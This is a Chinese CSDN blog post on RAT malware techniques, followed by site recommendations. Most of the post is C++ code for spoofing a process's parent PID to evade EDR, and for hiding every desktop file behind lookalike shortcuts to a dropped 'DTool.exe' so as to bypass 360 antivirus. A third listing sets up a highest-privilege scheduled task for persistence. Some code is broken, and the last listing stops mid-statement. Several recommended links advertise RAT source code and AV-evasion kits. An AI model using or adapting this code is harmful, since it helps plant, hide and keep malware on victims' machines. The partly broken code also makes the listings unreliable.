RAT 恶意软件的父进程检测绕过与权限维持持久免杀技术详解

于 2024-08-31 13:30:24 发布
阅读量112 收藏 2
点赞数 4
分类专栏: 网络安全 文章标签: 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57836225/article/details/141727312
版权

# 一、RAT 父进程检测与绕过技术(一)
1. 监控父进程和子进程关系是威胁检测团队常用技术,异常的父子进程组合易被 EDR 检测


2. Windows API 的“CreateProcess”可传入参数分配父进程 PID,Didier Stevens 在 2009 年提出该技术并发布 C++编写的 POC(SelectMyParent)。

以下是 SelectMyParent 的示例代码:

#include <windows.h>
#include <stdio.h>

int main(int argc, char* argv[])
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    // 设置父进程 PID
    DWORD targetPid = atoi(argv[2]);
    STARTUPINFOEX siex = { 0 };
    SIZE_T attributeSize;
    InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
    siex.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(siex.lpAttributeList, 1, 0, &attributeSize);
    DWORD64 value = (DWORD64)targetPid;
    UpdateProcThreadAttribute(siex.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &value, sizeof(DWORD64), NULL, NULL);

    if (!CreateProcess(NULL, argv[1], NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si, &pi))
    {
        printf("CreateProcess failed (%d).\n", GetLastError());
        return -1;
    }

    // 等待子进程结束
    WaitForSingleObject(pi.hProcess, INFINITE);

    // 清理
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    DeleteProcThreadAttributeList(siex.lpAttributeList);
    HeapFree(GetProcessHeap(), 0, siex.lpAttributeList);

    return 0;
}

使用方法:`SelectMyParent.exe notepad 508`,可让记事本在指定 PID 的进程下创建。

# 二、RAT 父进程检测与绕过技术(二)
1. 利用快捷方式绕过 360 数字父进程查杀,代码包括多个函数:
   - `bypass_360_startup`:主函数,依次调用`if_need_infection`、`set_hide_directory`、`create_link`。
   - `if_need_infection`:检查指定路径下是否有文件需要感染。
   - `set_hide_directory`:设置指定路径下文件为隐藏属性。
   - `create_link`:在指定路径下为每个文件创建同名快捷方式,快捷方式指向特定路径下的“DTool.exe”,并设置快捷方式图标。以下是完整的代码:

#include <windows.h>
#include <tchar.h>
#include <iostream>
#include <vector>

class CSearchFile
{
public:
    std::vector<struct FileInfo> MyVectorFile;
    void SearchFile(TCHAR szFind[], TCHAR str_disk[])
    {
        WIN32_FIND_DATA FindFileData;
        HANDLE hFind;
        TCHAR szFullPath[MAX_PATH];
        _stprintf(szFullPath, _T("%s\\%s"), str_disk, szFind);
        hFind = FindFirstFile(szFullPath, &FindFileData);
        if (hFind == INVALID_HANDLE_VALUE)
            return;
        do
        {
            if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
                if (FindFileData.cFileName[0]!= '.')
                {
                    TCHAR szSubDir[MAX_PATH];
                    _stprintf(szSubDir, _T("%s\\%s"), str_disk, FindFileData.cFileName);
                    SearchFile(szFind, szSubDir);
                }
            }
            else
            {
                FileInfo file;
                _tcsncpy(file.szFilePath, str_disk, MAX_PATH);
                _tcsncat(file.szFilePath, _T("\\"), MAX_PATH);
                _tcsncat(file.szFilePath, FindFileData.cFileName, MAX_PATH);
                MyVectorFile.push_back(file);
            }
        } while (FindNextFile(hFind, &FindFileData)!= 0);
        FindClose(hFind);
    }
};

struct FileInfo
{
    TCHAR szFilePath[MAX_PATH];
};

int bypass_360_startup()
{
    TCHAR str_desktop[256];
    LPITEMIDLIST pidl;
    SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl);
    SHGetPathFromIDList(pidl, str_desktop);

    if (if_need_infection(str_desktop) == 0)
    {
        OutputDebugStringA("bypass_360_startup if_need_infection return");
        return 0;
    }

    if (set_hide_directory(str_desktop) == 0)
    {
        OutputDebugStringA("bypass_360_startup set_hide_directory return");
        return 0;
    }

    if (create_link(str_desktop) == 0)
    {
        OutputDebugStringA("bypass_360_startup create_link return");
        return 0;
    }

    return 0;
}

int if_need_infection(TCHAR str_disk[])
{
    OutputDebugStringA("if_need_infection fun:");
    CSearchFile file;

    file.SearchFile(_T("."), str_disk);

    for (DWORD i = 0; i < file.MyVectorFile.size(); i++)
    {
        OutputDebugString(file.MyVectorFile[i].szFilePath);
    }

    if (file.MyVectorFile.size() > 0)
    {
        return 1;
    }

    return 0;
}

int set_hide_directory(TCHAR str_disk[])
{
    OutputDebugStringA("set_hide_directory fun:");
    CSearchFile file;

    file.SearchFile(_T("."), str_disk);

    for (DWORD i = 0; i < file.MyVectorFile.size(); i++)
    {
        SetFileAttributes(file.MyVectorFile[i].szFilePath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM);
        OutputDebugString(file.MyVectorFile[i].szFilePath);
    }

    return 1;
}

int create_link(TCHAR str_disk[])
{
    OutputDebugStringA("create_link fun:");
    CSearchFile file;

    file.SearchFile(_T("."), str_disk);

    for (DWORD i = 0; i < file.MyVectorFile.size(); i++)
    {
        TCHAR str_all_user_path[MAX_PATH] = { 0 };
        TCHAR str_exe_path[MAX_PATH] = { 0 };
        GetEnvironmentVariable(_T("ALLUSERSPROFILE"), str_all_user_path, MAX_PATH);
        _stprintf(str_exe_path, _T("%s\\updata\\DTool.exe"), str_all_user_path);

        TCHAR path_buffer[_MAX_PATH];
        _stprintf(path_buffer, _T("%s.lnk"), file.MyVectorFile[i].szFilePath);
        CreateLinkThenChangeIcon(str_exe_path, path_buffer);
    }

    return 1;
}

void CreateLinkThenChangeIcon(LPTSTR fname_to_create_link, LPTSTR lnk_fname)
{
    CoInitialize(0);

    HRESULT hres;
    IShellLink *psl = NULL;
    IPersistFile *pPf = NULL;
    WCHAR wsz[256];
    TCHAR buf[256];
    int id;
    LPITEMIDLIST pidl;

    hres = CoCreateInstance(CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER, IID_IShellLink, (LPVOID*)&psl);
    if (FAILED(hres))
        goto cleanup;
    hres = psl->QueryInterface(IID_IPersistFile, (LPVOID*)&pPf);
    if (FAILED(hres))
        goto cleanup;
    hres = psl->SetPath(fname_to_create_link);
    if (FAILED(hres))
        goto cleanup;

    SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl);

    SHGetPathFromIDList(pidl, buf);

    lstrcat(buf, _T("\\"));
    lstrcat(buf, lnk_fname);

#ifdef UNICODE
    hres = pPf->Save(buf, TRUE);
#else
    MultiByteToWideChar(CP_ACP, 0, lnk_fname, -1, wsz, MAX_PATH);
    hres = pPf->Save(wsz, TRUE);
#endif

    if (FAILED(hres))
        goto cleanup;

    GetSystemDirectory(buf, 256);

    lstrcat(buf, _T("\\shell32.dll"));

    hres = psl->SetIconLocation(buf, 3);

    if (FAILED(hres))
        goto cleanup;

    hres = psl->GetIconLocation(buf, 256, &id);

    if (FAILED(hres))
        goto cleanup;

    pPf->Save(wsz, TRUE);

cleanup:

    if (pPf)
        pPf->Release();

    if (psl)
        psl->Release();

    CoUninitialize();
}

# 三、RAT 利用权限维持持久免杀(三)
1. 实现原理分为初始化、添加计划任务和删除计划任务三部分。
   - **初始化**:
     - 初始化 COM 接口,设置 COM 安全级别。
     - 创建 Task Service 对象并连接,获取 ITaskService 对象和 ITaskFolder 对象。
   - **CreateTask(添加计划任务)**:
     - 创建任务定义对象,设置注册信息(作者、描述等)、主体信息(登录类型、运行权限)、任务相关信息(启动条件等)、创建触发器、设置执行操作。
     - 在 ITaskFolder 对象注册任务。
   - **DeleteTask(删除计划任务)**:根据任务名字直接删除。以下是代码示例:

#include <windows.h>
#include <comdef.h>
#include <iostream>

int main()
{
    HRESULT hr;
    ITaskService* pService = NULL;
    ITaskFolder* pRootFolder = NULL;
    ITaskDefinition* pTask = NULL;
    IRegistrationInfo* pRegInfo = NULL;
    IPrincipal* pPrincipal = NULL;
    ITaskSettings* pSettings = NULL;
    ITriggerCollection* pTriggerCollection = NULL;
    ITrigger* pTrigger = NULL;
    IActionCollection* pActionCollection = NULL;
    IAction* pAction = NULL;
    IExecAction* pExecAction = NULL;
    IRegisteredTask* pRegisteredTask = NULL;

    // 初始化 COM
    hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
    if (FAILED(hr))
    {
        std::cerr << "CoInitializeEx failed. HRESULT = " << hr << std::endl;
        return -1;
    }

    // 设置 COM security levels.
    hr = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, 0, NULL);
    if (FAILED(hr))
    {
        std::cerr << "CoInitializeSecurity failed. HRESULT = " << hr << std::endl;
        CoUninitialize();
        return -1;
    }

    // 创建 Task Service 对象
    hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER, IID_ITaskService, (void**)&pService);
    if (FAILED(hr))
    {
        std::cerr << "CoCreateInstance for ITaskService failed. HRESULT = " << hr << std::endl;
        CoUninitialize();
        return -1;
    }

    // 连接到 Task Service
    hr = pService->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
    if (FAILED(hr))
    {
        std::cerr << "ITaskService::Connect failed. HRESULT = " << hr << std::endl;
        if (pService)
            pService->Release();
        CoUninitialize();
        return -1;
    }

    hr = pService->GetFolder(_bstr_t(L"\\"), &pRootFolder);
    if (FAILED(hr))
    {
        std::cerr << "ITaskService::GetFolder failed. HRESULT = " << hr << std::endl;
        if (pService)
            pService->Release();
        CoUninitialize();
        return -1;
    }

    // 创建任务
    hr = pService->NewTask(0, &pTask);
    if (FAILED(hr))
    {
        std::cerr << "ITaskService::NewTask failed. HRESULT = " << hr << std::endl;
        if (pService)
            pService->Release();
        if (pRootFolder)
            pRootFolder->Release();
        CoUninitialize();
        return -1;
    }

    // 设置注册信息
    hr = pTask->get_RegistrationInfo(&pRegInfo);
    if (FAILED(hr))
    {
        std::cerr << "ITaskDefinition::get_RegistrationInfo failed. HRESULT = " << hr << std::endl;
        if (pTask)
            pTask->Release();
        if (pService)
            pService->Release();
        if (pRootFolder)
            pRootFolder->Release();
        CoUninitialize();
        return -1;
    }
    hr = pRegInfo->put_Author(_bstr_t(L"Author Name"));
    hr = pRegInfo->put_Description(_bstr_t(L"Task Description"));
    if (FAILED(hr))
    {
        std::cerr << "IRegistrationInfo::put_Author/put_Description failed. HRESULT = " << hr << std::endl;
        if (pRegInfo)
            pRegInfo->Release();
        if (pTask)
            pTask->Release();
        if (pService)
            pService->Release();
        if (pRootFolder)
            pRootFolder->Release();
        CoUninitialize();
        return -1;
    }

    // 设置主体信息
    hr = pTask->get_Principal(&pPrincipal);
    if (FAILED(hr))
    {
        std::cerr << "ITaskDefinition::get_Principal failed. HRESULT = " << hr << std::endl;
        if (pRegInfo)
            pRegInfo->Release();
        if (pTask)
            pTask->Release();
        if (pService)
            pService->Release();
        if (pRootFolder)
            pRootFolder->Release();
        CoUninitialize();
        return -1;
    }
    hr = pPrincipal->put_LogonType(TASK_LOGON_INTERACTIVE_TOKEN);
    hr = pPrincipal->put_RunLevel(TASK_RUNLEVEL_HIGHEST);
    if (FAILED(hr))
    {
        std::cerr << "IPrincipal::put_LogonType/put_RunLevel failed. HRESULT = " << hr << std::endl;
        if (pPrincipal)
            pPrincipal->Release();
        if (pRegInfo)
            pRegInfo->Release();
        if (pTask)
            pTask->Release();
        if (pService)
            pService->Release();
        if (pRootFolder)
            pRootFolder->Release();
        CoUninitialize();
        return -1;
    }

    // 设置任务相关信息
    hr = pTask->get_Settings(&pSettings);
    if (FAILED(hr))
    {
        std::cerr << "ITaskDefinition::get_Settings failed. HRESULT = " << hr << std::endl;
        if (pPrincipal)
            pPrincipal->Release();
        if (pRegInfo)
            pRegInfo->Release();
        if (pTask)
            pTask->Release();
        if (pService)
            pService->Release();
        if (pRootFolder)
            pRootFolder->Release();
        CoUninitialize();
        return -1;
    }
    hr = pSettings->put_StartWhenAvailable(VARIANT_TRUE);
    hr = pSettings->get_IdleSettings(&pIdleSettings);
    if (FAILED(hr))
    {
        std::cerr << "ITaskSettings::put_StartWhenAvailable/get_IdleSettings failed. HRESULT = " << hr << std::endl;
        if (pSettings)
            pSettings->Release();
        if (pPrincipal)
            pPrincipal->Release();
        if (pRegInfo)
            pRegInfo->Release();
        if (pTask)
            pTask->Release();
        if (pService)
            pService->Release();
        if (pRootFolder)
            pRootFolder->Release();
        CoUninitialize();
        return -1;
    }

    // 创建触发器
    hr = pTask->get_Triggers(&pTriggerCollection)

阿贾克斯的黎明
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
免杀技术RAT.pdf
02-10
免杀RAT思维导图,便捷整理思路,检测原理、软件保护、免杀技术、shell生成、在线多引擎查杀网站与AV厂商共享信息
Gh0st2023远控RAT、重写大灰狼远控RAT核心功能与组件模块、免杀主流防病毒软件
09-02
2. **隐蔽性**:为了逃避检测,这些RATs通常包含免杀技术,这意味着它们可以绕过主流的防病毒软件。免杀技术可能包括代码混淆、动态加载模块、多态性或加密通信等策略。 3. **模块化设计**:这两种RAT都采用了模块...
Star Rat 3.1完整源码.rar_Star Rat 3.1 源码_Star Rat3.1_neckqvc_rat源码_免
07-14
Star Rat 3.1源码 免杀可以自己编译
全套免杀教程+免杀工具合集
08-25
远控免杀专题(10)-TheFatRat免杀(VT免杀率22-70).pdf 元控免杀专题(11)-Avoidz免杀(VT免杀率23-71).pdf 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23-70).pdf 远控免杀专题(13)-zirikatu免杀(VT免杀率39-71)....
免杀神器thefatrat
01-06
免杀神器TheFatrat详解】 TheFatrat是一款强大的黑客工具包,主要用于Windows系统的渗透测试和漏洞利用。尽管在描述中提到"linux下使用(用linux下太慢了!!!)",但TheFatrat主要设计用于在Linux环境下运行,...
汉服文化平台网站
heye0910032的博客
08-26 1541
本文主要探讨了使用Java语言开发汉服文化平台网站的全过程。系统采用B/S架构,严格遵循软件开发流程,从分析、设计到实现,确保了项目的系统性和科学性。系统主要面向管理员和用户两大类使用者,提供了包括首页、个人中心、汉服知识管理、服装展示管理、用户相册管理、论坛交流、系统管理、订单管理等功能。本系统的应用,旨在实现汉服文化信息管理的信息化,提高管理效率,方便用户访问和交流。通过本毕业设计,我深入学习并实践了Java语言和SSM框架在Web开发中的应用。
redis能正常访问,但是springboot编译报错
生而为人我很抱歉
08-27 623
因为你在自定义的 @Configuration 类中没有明确指定配置属性的绑定,或者这个类的加载顺序影响了 Spring Boot 的属性绑定过程。你可以尝试在 MyConf 类上加上 @Order 注解来调整加载顺序,或者确保 MyConf 类不会干扰到 Redis 配置的加载。你可以在 MyConf 类上使用 @ConditionalOnProperty 注解,确保在特定条件下才加载这个配置类,以避免在 Redis 配置加载之前进行不必要的初始化。
修复数据库中的 “Access Denied: SUPER Privilege Required” 错误
xiaochong0302的博客
08-26 1393
当您使用数据库时,您可能会看到错误消息:“Access denied; you need (at least one of) the SUPER privilege(s) for this operation”。当您的数据库用户没有足够的权限来执行某些操作时,就会发生这种情况。
python12 中,No module named‘distutils‘错误
qq_43557600的博客
08-27 8701
python12 “ No module named'distutils' ”,​ 安装 pip install setuptools ,解决 ​
数据库管理-第236期 数据库一体机的价值(20240829)
yhw1809的博客
08-29 1004
数据库一体机是硬件、操作系统和数据库之间的融合,利用更少的硬件实现小体积的高性能密度。
(1)Hilt的基本概念和使用
challenge51all的专栏
08-27 1356
Jetpack Hilt 是一个强大的依赖注入框架,它简化了 Android 应用中的依赖管理,提高了代码的可维护性和可测试性。通过使用注解和模块,开发人员可以轻松地管理应用中的依赖关系,并在不同的组件之间共享和注入依赖。在应用的 Application 类上使用这个注解,告诉 Hilt 这是一个使用 Hilt 进行依赖注入的应用。Jetpack Hilt 是一个用于 Android 的依赖注入框架,它建立在 Dagger 的基础上,旨在简化 Android 应用中的依赖注入过程。
MYSQL数据库初体验
qq_63994746的博客
08-28 1579
面向Windows操作系统简单、易用华为:欧拉阿里:龙蜥腾讯:tencentOS麒麟:(银河麒麟、中标麒麟 – >centos 优麒麟 – > Ubuntu )统信:uos红旗深度:deepin。
在Postgresql中计算工单的对应的GPS轨迹距离
专注GIS软件开发。
08-30 282
在某个App开发中,要求记录用户的日常轨迹,在用户巡逻设备的时,将记录的轨迹点当做该设备巡逻时候的轨迹。由于业务逻辑上没有明确的指示人员巡逻工单-GPS位置之间的关系,所以通过时间关系进行轨迹划定。
SpringBoot项目初始化搭建
最新发布
weixin_63405049的博客
08-30 777
本章主要讲解了SpringBoot项目初始化搭建,编程事务的使用,分页依赖的使用,以及跨域问题如何解决,解决了轻量级项目构建初期遇到的一些问题,提供于前后端交互时产生的问题进行分析与解决
基于协同过滤算法的电影推荐系统的设计与实现(论文+源码)_kaic
weixin_52720882的博客
08-30 786
2020年张志军在《基于协同过滤算法和强化学习的电影推荐系统》文章中提出了一种全新的电影推荐框架叫做CF-DQN推荐框架,它是基于协同过滤算法的改进的强化学习的电影推荐框架,用于实时的电影推荐。
【mac】brew 更新
qq_43331089的博客
08-30 241
要获取最新的包的列表,首先得更新 Homebrew 自己。这可以用办到。完后会显示可以更新的包列表,其中打钩的是已经安装的包。
sqli-labs靶场通关攻略 46-50
2301_82061181的博客
08-29 1192
判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)步骤一:利用时间盲注查询数据库。步骤一:利用报错注入查询库。步骤一:利用报错注入查询库。步骤一:利用报错注入查询库。
threadlocal的一些用法,以及如何解决可重入分布式redis锁
pige666的博客
08-26 382
好的,经过我的思考,threadlocal是一个还不错的选择,因为是对线程内共享的,事实上threadlocal应该是为了解决一些在线程内传递状态所使用的手段,(要不然你还得疯狂传参,中间要是遇到封装的第三方库,你还改不了),好,这个状态其实说起来应该是叫上下文context比较合适,除了状态外,它也可以是用户身份,任务信息等。这里的话对于可重入分布式锁,就可以有一个Integer类型的threadlocal变量,重入就+1,释放就-1,直到0了,才真正释放锁就可以了。
基于Spark的云南旅游大数据分析平台
qq_40309403的博客
08-28 618
Hi,大家好,今天分享的项目是《基于Spark的云南旅游大数据分析平台》
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值